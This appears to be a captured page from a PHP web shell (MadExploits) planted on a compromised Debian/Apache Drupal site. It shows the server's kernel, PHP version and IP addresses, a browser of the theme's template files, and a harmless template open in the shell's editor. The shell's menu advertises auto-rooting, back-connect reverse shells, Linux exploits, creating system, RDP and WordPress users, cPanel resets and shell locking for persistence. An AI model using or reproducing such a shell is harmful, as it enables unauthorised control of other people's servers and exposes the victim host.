Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.247.24
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
sites /
all /
themes /
zen /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
block--no-wrapper.tpl.php
394
B
-rw-r--r--
block.tpl.php
493
B
-rw-r--r--
comment-wrapper.tpl.php
890
B
-rw-r--r--
comment.tpl.php
1.26
KB
-rw-r--r--
html.tpl.php
1.99
KB
-rw-r--r--
maintenance-page.tpl.php
2.89
KB
-rw-r--r--
node.tpl.php
1.25
KB
-rw-r--r--
page.tpl.php
3.77
KB
-rw-r--r--
pane-header.tpl.php
989
B
-rw-r--r--
pane-messages.tpl.php
384
B
-rw-r--r--
pane-navigation.tpl.php
512
B
-rw-r--r--
panels-pane.tpl.php
874
B
-rw-r--r--
region--footer.tpl.php
310
B
-rw-r--r--
region--no-wrapper.tpl.php
213
B
-rw-r--r--
region--sidebar.tpl.php
295
B
-rw-r--r--
region.tpl.php
279
B
-rw-r--r--
user-picture.tpl.php
314
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pane-navigation.tpl.php
<?php /** * @file * Returns the HTML for Panels Everywhere's navigation pane. * * Complete documentation for this file is available online. * @see https://drupal.org/node/2052513 */ ?> <?php if (!empty($main_menu)): ?> <nav id="main-menu" role="navigation" tabindex="-1"> <?php print $main_menu; ?> </nav> <?php endif; ?> <?php if (!empty($secondary_menu)): ?> <nav id="secondary-menu" role="navigation"> <?php print $secondary_menu; ?> </nav> <?php endif; ?> <?php print $breadcrumb; ?>
Close